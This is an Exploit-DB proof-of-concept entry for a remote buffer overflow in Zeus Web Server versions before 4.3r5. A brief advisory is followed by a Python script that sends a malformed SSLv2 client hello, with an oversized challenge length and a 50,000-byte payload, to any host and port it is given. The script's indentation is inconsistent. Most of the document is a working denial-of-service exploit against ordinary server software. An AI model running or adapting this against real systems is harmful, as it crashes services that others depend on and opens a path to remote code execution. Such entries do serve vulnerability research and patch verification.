Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow (PoC)

EDB-ID:

33531


Author:

Intevydis

Type:

dos


Platform:

Multiple

Date:

2010-01-15


source: https://www.securityfocus.com/bid/37829/info

Zeus Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Zeus Web Server 4.3r5 are vulnerable. 

#!/usr/bin/env python
# zeus_ssl2.py
#
# Use this code at your own risk. Never run it against a production system.
# 
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import socket
import sys
import struct

def send_req(host,port):
        buf=""
        buf+=chr(1)
        buf+="\x00\x02" 
        buf+=struct.pack(">H",21)
        buf+=struct.pack(">H",0xffff)                                
        buf+=struct.pack(">H",16)
        buf+="\x07\x00\xc0\x03\x00\x80\x01\x00\x80\x08\x00\x80"
       buf+="\x06\x00\x40\x04\x00\x80\x02\x00\x80"
        buf+="A"* 50000  
        buf+="C"*16

        siz =  chr( ( (len(buf) & 0xff00) >> 8)| 0x80) + chr(len(buf)&0xff)
        buf = siz + buf

 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 sock.connect((host,port))
 sock.sendall(buf)
 sock.recv(1000)
 sock.close()

if __name__=="__main__":
 if len(sys.argv)<3:
  print "usage: %s host port" % sys.argv[0]
  sys.exit()

 send_req(sys.argv[1],int(sys.argv[2]))